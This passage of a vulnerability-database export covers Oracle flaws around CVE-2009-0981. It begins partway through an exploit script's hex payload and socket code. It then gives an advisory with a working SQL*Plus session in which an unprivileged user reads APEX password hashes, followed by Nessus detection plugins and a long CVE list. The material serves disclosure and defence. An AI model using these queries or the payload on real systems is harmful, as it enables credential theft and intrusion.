68\\xc5\\x2f\\x22"\r\n\t"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22"\r\n\t"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f"\r\n\t"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\t"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00"\r\n)\r\n\r\nsockobj.close()\r\n\r\n# milw0rm.com [2009-04-21]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66468"}, {"lastseen": "2017-11-19T18:58:58", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-04-17T00:00:00", "published": "2009-04-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11029", "id": "SSV:11029", "type": "seebug", "title": "Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes", "sourceData": "\n Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]\r\n\r\nName \t\t\tUnprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]\r\nSystems Affected \tAPEX 3.0 (optional component of 11.1.0.7 installation)\r\nSeverity \t\tHigh Risk\r\nCategory \t\tPassword Disclosure\r\nVendor URL \t\thttp://www.oracle.com/\r\nAuthor \t\t\tAlexander Kornbrust (ak at red-database-security.com)\r\nCVE \t\t\tCVE-2009-0981\r\nAdvisory \t\t14 April 2009 (V 1.00)\r\n\r\n\r\nDetails\r\nUnprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.\r\nTested on 11.1.0.7.\r\n\r\nC:\\> sqlplus dummy/dummy\r\nConnected to:\r\nOracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production\r\nWith the Partitioning, OLAP, Data Mining and Real Application Testing options\r\n\r\nSQL> select granted_role from user_role_privs;\r\n\r\nGRANTED_ROLE\r\n------------------------------\r\nCONNECT\r\n\r\n\r\nSQL> select owner,table_name from all_tables where owner='FLOWS_030000';\r\n\r\nOWNER TABLE_NAME\r\n------------------------------ ------------------------------\r\nFLOWS_030000 WWV_FLOW_DUAL100\r\nFLOWS_030000 WWV_FLOW_LOV_TEMP\r\nFLOWS_030000 WWV_FLOW_TEMP_TABLE\r\n\r\n\r\n\r\nGet a list of all columns containing the string "%PASSWORD%'\r\n\r\nSQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';\r\n\r\nOWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME\r\n--------------------------------------------------------------------------------\r\nFLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE\r\nFLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED\r\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW\r\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2\r\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD\r\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS\r\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES\r\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT\r\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE\r\n\r\n9 rows selected.\r\n\r\n\r\nSQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS\r\n\r\nUSER_NAME WEB_PASSWORD2\r\n--------------------------------------------------------------------------------\r\nYURI 141FA790354FB6C72802FDEA86353F31\r\n\r\nThis password hash can be checked using a tool like Repscan.\r\n\r\n\r\nPatch Information\r\nApply the patches for Oracle CPU April 2009.\r\n\r\n\r\nHistory\r\n13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]\r\n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]\r\n14-apr-2009 Advisory published\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11029", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2019-01-16T20:12:29", "bulletinFamily": "scanner", "description": "The remote Oracle database server is missing the April 2009 Critical\nPatch Update (CPU) and therefore is potentially affected by security\nissues in the following components :\n\n - Advanced Queuing\n\n - Application Express\n\n - Cluster Ready Services\n\n - Core RDBMS\n\n - Database Vault\n\n - Listener\n\n - Password Policy\n\n - Resource Manager\n\n - SQLX Functions\n\n - Workspace Manager", "modified": "2018-11-15T00:00:00", "published": "2011-11-16T00:00:00", "id": "ORACLE_RDBMS_CPU_APR_2009.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56064", "title": "Oracle Database Multiple Vulnerabilities (April 2009 CPU)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (!defined_func(\"nasl_level\") || nasl_level() < 5000) exit(0, \"Nessus older than 5.x\");\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56064);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\n \"CVE-2009-0972\",\n \"CVE-2009-0973\",\n \"CVE-2009-0975\",\n \"CVE-2009-0976\",\n \"CVE-2009-0977\",\n \"CVE-2009-0978\",\n \"CVE-2009-0979\",\n \"CVE-2009-0980\",\n \"CVE-2009-0981\",\n \"CVE-2009-0984\",\n \"CVE-2009-0985\",\n \"CVE-2009-0986\",\n \"CVE-2009-0988\",\n \"CVE-2009-0991\",\n \"CVE-2009-0992\",\n \"CVE-2009-0997\"\n );\n script_bugtraq_id(34461);\n\n script_name(english:\"Oracle Database Multiple Vulnerabilities (April 2009 CPU)\");\n script_summary(english:\"Checks installed patch info\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle database server is missing the April 2009 Critical\nPatch Update (CPU) and therefore is potentially affected by security\nissues in the following components :\n\n - Advanced Queuing\n\n - Application Express\n\n - Cluster Ready Services\n\n - Core RDBMS\n\n - Database Vault\n\n - Listener\n\n - Password Policy\n\n - Resource Manager\n\n - SQLX Functions\n\n - Workspace Manager\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a3c49435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2009 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:database_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_rdbms_query_patch_info.nbin\", \"oracle_rdbms_patch_info.nbin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"misc_func.inc\");\n\n################################################################################\n# APR2009\npatches = make_nested_array();\n\n# RDBMS 11.1.0.7\npatches[\"11.1.0.7\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"11.1.0.7.0.1\", \"CPU\", \"8290478\");\npatches[\"11.1.0.7\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"11.1.0.7.1\", \"CPU\", \"8343061\");\npatches[\"11.1.0.7\"][\"db\"][\"win64\"] = make_array(\"patch_level\", \"11.1.0.7.1\", \"CPU\", \"8343070\");\n# RDBMS 11.1.0.6\npatches[\"11.1.0.6\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"11.1.0.6.6\", \"CPU\", \"8290402\");\npatches[\"11.1.0.6\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"11.1.0.6.9\", \"CPU\", \"8333655\");\npatches[\"11.1.0.6\"][\"db\"][\"win64\"] = make_array(\"patch_level\", \"11.1.0.6.9\", \"CPU\", \"8333657\");\n# RDBMS 10.1.0.5\npatches[\"10.1.0.5\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"10.1.0.5.14\", \"CPU\", \"8290534\");\npatches[\"10.1.0.5\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"10.1.0.5.32\", \"CPU\", \"8300356\");\n# RDBMS 10.2.0.4\npatches[\"10.2.0.4\"][\"db\"][\"nix\"] = make_array(\"patch_level\", \"10.2.0.4.0.4\", \"CPU\", \"8290506\");\npatches[\"10.2.0.4\"][\"db\"][\"win32\"] = make_array(\"patch_level\", \"10.2.0.4.18\", \"CPU\", \"8307237\");\npatches[\"10.2.0.4\"][\"db\"][\"win64\"] = make_array(\"patch_level\", \"10.2.0.4.18\", \"CPU\", \"8307238\");\n\ncheck_oracle_database(patches:patches, high_risk:TRUE);\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-17T02:50:36", "bulletinFamily": "scanner", "description": "Unprivileged database users can see Oracle Apex password hashes in FLOWS_030000.WWV_FLOW_USER.", "modified": "2018-11-15T00:00:00", "published": "2013-02-20T00:00:00", "id": "ORACLE_APEX_CVE-2009-0981.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64708", "title": "Oracle Application Express (Apex) CVE-2009-0981", "type": "nessus", "sourceData": "# ---------------------------------------------------------------------------------\n# (c) Recx Ltd 2009-2012\n# http://www.recx.co.uk/\n#\n# Detection script for multiple issues within Oracle Application Express\n#\n# 3.0\n# https://www.oracle.com/technetwork/topics/security/cpuapr2009-099563.html\n# http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=786800.1\n# http://www.red-database-security.com/advisory/apex_password_hashes.html\n# Unspecified vulnerability in the Application Express component in Oracle Database 11.1.0.7 allows remote authenticated users to affect confidentiality, related to APEX\n# CVE-2009-0981\n#\n# Version 1.0\n# ---------------------------------------------------------------------------------\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64708);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2009-0981\");\n script_bugtraq_id(34461);\n\n script_name(english:\"Oracle Application Express (Apex) CVE-2009-0981\");\n script_summary(english:\"Checks Apex version against CVE-2009-0981\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is running a vulnerable version of Oracle Apex.\");\n script_set_attribute(attribute:\"description\", value:\n\"Unprivileged database users can see Oracle Apex password hashes in FLOWS_030000.WWV_FLOW_USER.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade Application Express to at least version 4.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.oracle.com/technetwork/developer-tools/apex/index.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/topics/security/cpuapr2009-099563.html\");\n # http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=786800.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7fa76004\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.red-database-security.com/advisory/apex_password_hashes.html\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:oracle:application_express\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Recx Ltd.\");\n\n script_dependencies(\"oracle_apex_detect_version.nasl\");\n script_require_keys(\"Oracle/Apex\");\n script_require_ports(\"Services/www\", 8080, 80, 443);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nfunction raise_finding(port, report)\n{\n if(report_verbosity > 0)\n security_warning(port:port, extra:report);\n else security_warning(port);\n}\n\nport = get_http_port(default:8080);\n\nif (!get_port_state(port)) exit(0, \"Port \" + port + \" is not open.\");\n\nversion = get_kb_item(\"Oracle/Apex/\"+port+\"/Version\");\nif(!version) exit(0, \"The 'Oracle/Apex/\" + port + \"/Version' KB item is not set.\");\n\nlocation = get_kb_item(\"Oracle/Apex/\" + port + \"/Location\");\nif(!location) exit(0, \"The 'Oracle/Apex/\" + port + \"/Location' KB item is not set.\");\nurl = build_url(qs:location, port:port);\n\nif (version == \"3.2.1\")\n{\n report = '\\n URL : ' + url +\n\t '\\n Installed version : ' + version +\n\t '\\n Fixed version : 4.0' + '\\n';\n raise_finding(port:port, report:report);\n exit(0);\n}\n\nexit(0, \"The Oracle Apex install at \" + url + \" is version \" + version + \" and is not affected.\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:13:01", "bulletinFamily": "scanner", "description": "The remote host is running Oracle Application Server. It was not possible\nto determine its version, so the version of Oracle Application Server\ninstalled on the remote host could potentially be affected by multiple\nvulnerabilities :\n\n - CVE-2000-0169: Remote command execution in the web\n listener component.\n\n - CVE-2000-1235: Information disclosure in the port\n listener component and modplsql.\n\n - CVE-2000-1236: SQL injection in mod_sql.\n\n - CVE-2001-0326: Information disclosure in the Java\n Virtual Machine.\n\n - CVE-2001-0419: Buffer overflow in ndwfn4.so.\n\n - CVE-2001-0591: Directory traversal.\n\n - CVE-2001-1216: Buffer overflow in the PL/SQL Apache module.\n\n - CVE-2001-1217: Directory traversal vulnerability in the\n PL/SQL Apache module.\n\n - CVE-2001-1371: Improper access control in the SOAP\n service.\n\n - CVE-2001-1372: Information disclosure.\n\n - CVE-2002-0386: Denial of service through the\n administration module for Oracle Web Cache.\n\n - CVE-2002-0559: Buffer overflows in the PL/SQL module.\n\n - CVE-2002-0560: Information disclosure in the PL/SQL\n module.\n\n - CVE-2002-0561: Authentication bypass in the PL/SQL\n Gateway web administration interface.\n\n - CVE-2002-0562: Information disclosure through\n globals.jsa.\n\n - CVE-2002-0563: Improper access control on several\n services.\n\n - CVE-2002-0564: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2002-0565: Information disclosure through JSP files\n in the _pages directory.\n\n - CVE-2002-0566: Denial of service in the PL/SQL module.\n\n - CVE-2002-0568: Improper access control on XSQLConfig.xml\n and soapConfig.xml.\n\n - CVE-2002-0569: Authentication bypass through\n XSQLServlet.\n\n - CVE-2002-0655: Denial of service in OpenSSL.\n\n - CVE-2002-0656: Buffer overflows in OpenSSL.\n\n - CVE-2002-0659: Denial of service in OpenSSL.\n\n - CVE-2002-0840: Cross-site scripting in the default error\n page of Apache.\n\n - CVE-2002-0842: Format string vulnerability in mod_dav.\n\n - CVE-2002-0843: Buffer overflows in ApacheBench.\n\n - CVE-2002-0947: Buffer overflow in rwcgi60.\n\n - CVE-2002-1089: Information disclosure in rwcgi60.\n\n - CVE-2002-1630: Improper access control on sendmail.jsp.\n\n - CVE-2002-1631: SQL injection in query.xsql.\n\n - CVE-2002-1632: Information disclosure through several\n JSP pages.\n\n - CVE-2002-1635: Information disclosure in Apache.\n\n - CVE-2002-1636: Cross-site scripting in the htp PL/SQL\n package.\n\n - CVE-2002-1637: Default credentials in multiple\n components.\n\n - CVE-2002-1858: Information disclosure through the\n WEB-INF directory.\n\n - CVE-2002-2153: Format string vulnerability in the\n administrative pages of the PL/SQL module.\n\n - CVE-2002-2345: Credential leakage in the web cache\n administrator interface.\n\n - CVE-2002-2347: Cross-site scripting in several JSP\n pages.\n\n - CVE-2004-1362: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2004-1363: Buffer overflow in extproc.\n\n - CVE-2004-1364: Directory traversal in extproc.\n\n - CVE-2004-1365: Command execution in extproc.\n\n - CVE-2004-1366: Improper access control on\n emoms.properties.\n\n - CVE-2004-1367: Credential leakage in Database Server.\n\n - CVE-2004-1368: Arbitrary file execution in ISQL*Plus.\n\n - CVE-2004-1369: Denial of service in TNS Listener.\n\n - CVE-2004-1370: Multiple SQL injection vulnerabilities in\n PL/SQL.\n\n - CVE-2004-1371: Stack-based buffer overflow.\n\n - CVE-2004-1707: Privilege escalation in dbsnmp and nmo.\n\n - CVE-2004-1774: Buffer overflow in the MD2 package.\n\n - CVE-2004-1877: Phishing vulnerability in Single Sign-On\n component.\n\n - CVE-2004-2134: Weak cryptography for passwords in the\n toplink mapping workBench.\n\n - CVE-2004-2244: Denial of service in the XML parser.\n\n - CVE-2005-1383: Authentication bypass in HTTP Server.\n\n - CVE-2005-1495: Detection bypass.\n\n - CVE-2005-1496: Privilege escalation in the\n DBMS_Scheduler.\n\n - CVE-2005-2093: Web cache poisoning.\n\n - CVE-2005-3204: Cross-site scripting.\n\n - CVE-2005-3445: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2005-3446: Unspecified vulnerability in Internet\n Directory.\n\n - CVE-2005-3447: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2005-3448: Unspecified vulnerability in the OC4J\n module.\n\n - CVE-2005-3449: Multiple unspecified vulnerabilities in\n multiple components.\n\n - CVE-2005-3450: Unspecified vulnerability in HTTP Server.\n\n - CVE-2005-3451: Unspecified vulnerability in\n SQL*ReportWriter.\n\n - CVE-2005-3452: Unspecified vulnerability in Web Cache.\n\n - CVE-2005-3453: Multiple unspecified vulnerabilities in\n Web Cache.\n\n - CVE-2006-0273: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2006-0274: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0275: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0282: Unspecified vulnerability.\n\n - CVE-2006-0283: Unspecified vulnerability.\n\n - CVE-2006-0284: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0285: Unspecified vulnerability in the Java Net\n component.\n\n - CVE-2006-0286: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0287: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0288: Multiple unspecified vulnerabilities in\n the Oracle Reports Developer component.\n\n - CVE-2006-0289: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0290: Unspecified vulnerability in the Oracle\n Workflow Cartridge component.\n\n - CVE-2006-0291: Multiple unspecified vulnerabilities in\n the Oracle Workflow Cartridge component.\n\n - CVE-2006-0435: Unspecified vulnerability in Oracle\n PL/SQL.\n\n - CVE-2006-0552: Unspecified vulnerability in the Net\n Listener component.\n\n - CVE-2006-0586: Multiple SQL injection vulnerabilities.\n\n - CVE-2006-1884: Unspecified vulnerability in the Oracle\n Thesaurus Management System component.\n\n - CVE-2006-3706: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3707: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3708: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3709: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3710: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3711: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3712: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3713: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3714: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5353: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5354: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5355: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5356: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5357: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5358: Unspecified vulnerability in the Oracle\n Forms component.\n\n - CVE-2006-5359: Multiple unspecified vulnerabilities in\n Oracle Reports Developer component.\n\n - CVE-2006-5360: Unspecified vulnerability in Oracle Forms\n component.\n\n - CVE-2006-5361: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5362: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5363: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5364: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5365: Unspecified vulnerability in Oracle\n Forms.\n\n - CVE-2006-5366: Multiple unspecified vulnerabilities.\n\n - CVE-2007-0222: Directory traversal vulnerability in\n EmChartBean.\n\n - CVE-2007-0275: Cross-site scripting vulnerability in\n Oracle Reports Web Cartridge (RWCGI60).\n\n - CVE-2007-0280: Buffer overflow in Oracle Notification\n Service.\n\n - CVE-2007-0281: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2007-0282: Unspecified vulnerability in OPMN02.\n\n - CVE-2007-0283: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0284: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-0285: Unspecified vulnerability in Oracle\n Reports Developer.\n\n - CVE-2007-0286: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0287: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0288: Unspecified vulnerability in Oracle\n Internet Directory.\n\n - CVE-2007-0289: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-1359: Improper access control in mod_security.\n\n - CVE-2007-1609: Cross-site scripting vulnerability in\n servlet/Spy in Dynamic Monitoring Services (DMS).\n\n - CVE-2007-2119: Cross-site scripting vulnerability in the\n Administration Front End for Oracle Enterprise (Ultra)\n Search.\n\n - CVE-2007-2120: Denial of service in the Oracle\n Discoverer servlet.\n\n - CVE-2007-2121: Unspecified vulnerability in the COREid\n Access component.\n\n - CVE-2007-2122: Unspecified vulnerability in the Wireless\n component.\n\n - CVE-2007-2123: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2124: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2130: Unspecified vulnerability in Workflow\n Cartridge.\n\n - CVE-2007-3553: Cross-site scripting vulnerability in\n Rapid Install Web Server.\n\n - CVE-2007-3854: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and the Spatial\n component.\n\n - CVE-2007-3859: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-3861: Unspecified vulnerability in Oracle\n Jdeveloper.\n\n - CVE-2007-3862: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-3863: Unspecified vulnerability in Oracle\n JDeveloper.\n\n - CVE-2007-5516: Unspecified vulnerability in the Oracle\n Process Mgmt & Notification component.\n\n - CVE-2007-5517: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5518: Unspecified vulnerability in HTTP Server.\n\n - CVE-2007-5519: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5520: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5521: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-5522: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5523: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5524: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5525: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5526: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5531: Unspecified vulnerability in Oracle Help\n for Web.\n\n - CVE-2008-0340: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and Spatial component.\n\n - CVE-2008-0343: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0344: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0345: Unspecified vulnerability in the Core\n RDBMS component.\n\n - CVE-2008-0346: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-0347: Unspecified vulnerability in the Oracle\n Ultra Search component.\n\n - CVE-2008-0348: Multiple unspecified vulnerabilities in\n the PeopleTools component.\n\n - CVE-2008-0349: Unspecified vulnerability in the\n PeopleTools component.\n\n - CVE-2008-1812: Unspecified vulnerability in the Oracle\n Enterprise Manager component.\n\n - CVE-2008-1814: Unspecified vulnerability in the Oracle\n Secure Enterprise Search or Ultrasearch component.\n\n - CVE-2008-1823: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-1824: Unspecified vulnerability in the Oracle\n Dynamic Monitoring Service component.\n\n - CVE-2008-1825: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2583: Unspecified vulnerability in the sample\n Discussion Forum Portlet for the Oracle Portal\n component.\n\n - CVE-2008-2588: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-2589: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2593: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2594: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2595: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2008-2609: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2612: Unspecified vulnerability in the Hyperion\n BI Plus component.\n\n - CVE-2008-2614: Unspecified vulnerability in HTTP Server.\n\n - CVE-2008-2619: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2008-2623: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-3975: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3977: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3986: Unspecified vulnerability in the Oracle\n Discoverer Administrator component.\n\n - CVE-2008-3987: Unspecified vulnerability in the Oracle\n Discoverer Desktop component.\n\n - CVE-2008-4014: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2008-4017: Unspecified vulnerability in the OC4J\n component.\n\n - CVE-2008-5438: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-7233: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2009-0217: Signature spoofing vulnerability in\n multiple components.\n\n - CVE-2009-0989: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0990: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0994: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1008: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1009: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1010: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1011: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1017: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1976: Unspecified vulnerability in HTTP Server.\n\n - CVE-2009-1990: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-1999: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-3407: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2009-3412: Unspecified vulnerability in the Unzip\n component.\n\n - CVE-2010-0066: Unspecified vulnerability in the Access\n Manager Identity Server component.\n\n - CVE-2010-0067: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2010-0070: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-0789: Unspecified vulnerability in HTTP Server.\n\n - CVE-2011-0795: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2011-0884: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2011-2237: Unspecified vulnerability in the Oracle\n Web Services Manager component.\n\n - CVE-2011-2314: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-3523: Unspecified vulnerability in the Oracle\n Web Services Manager component.", "modified": "2018-07-16T00:00:00", "published": "2012-01-24T00:00:00", "id": 